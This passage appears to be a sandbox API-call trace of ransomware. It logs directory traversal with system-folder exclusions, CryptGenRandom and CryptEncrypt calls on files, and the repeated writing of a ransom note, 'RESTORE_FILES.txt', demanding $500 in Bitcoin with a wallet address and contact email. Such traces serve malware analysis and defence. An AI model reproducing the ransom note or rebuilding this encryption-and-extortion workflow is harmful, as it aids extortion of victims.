lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.712] CloseHandle (hObject=0xac) returned 1 [0044.713] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0044.713] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0044.713] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0044.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.713] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0044.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.713] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.713] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0044.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.713] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.714] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0044.714] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.714] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.714] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.714] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.716] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.716] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.716] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\RESTORE_FILES.txt") returned 35 [0044.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pl-pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.716] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.716] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.717] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.717] WriteFile (in: hFile=0xac, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.717] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.717] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.717] CloseHandle (hObject=0xac) returned 1 [0044.717] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files (x86)") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="$Recycle.bin") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="System Volume Information") returned -1 [0044.717] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0044.717] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0044.717] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0044.717] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0044.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.718] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0044.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.718] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0044.718] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.718] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.718] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0044.718] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.718] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="RESTORE_FILES.txt") returned -1 [0044.718] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.718] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.718] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.718] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\RESTORE_FILES.txt") returned 35 [0044.719] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pt-br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.719] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.719] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.719] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.719] WriteFile (in: hFile=0xac, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.719] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.720] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.720] CloseHandle (hObject=0xac) returned 1 [0044.720] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files (x86)") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="$Recycle.bin") returned 1 [0044.720] lstrcmpiW (lpString1="pt-PT", lpString2="System Volume Information") returned -1 [0044.720] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0044.720] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0044.720] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0044.720] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0044.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.720] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0044.720] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.720] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.720] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0044.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.720] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.721] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.721] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.721] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0044.721] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.721] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.721] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.721] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.721] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0044.721] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.721] lstrcmpW (lpString1="bootmgr.exe.mui", 
lpString2="RESTORE_FILES.txt") returned -1 [0044.721] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.721] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.721] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.722] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.722] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.722] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\RESTORE_FILES.txt") returned 35 [0044.722] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pt-pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.722] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.722] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.723] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.723] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.723] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.723] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.723] CloseHandle (hObject=0xac) returned 1 [0044.723] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Windows") returned -1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files") returned 1 [0044.723] lstrcmpiW (lpString1="ru-RU", lpString2="Program Files (x86)") returned 1 [0044.724] lstrcmpiW (lpString1="ru-RU", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1="ru-RU", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0044.724] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0044.724] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0044.724] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.724] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.724] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.724] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.724] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0044.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.724] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.724] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.724] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
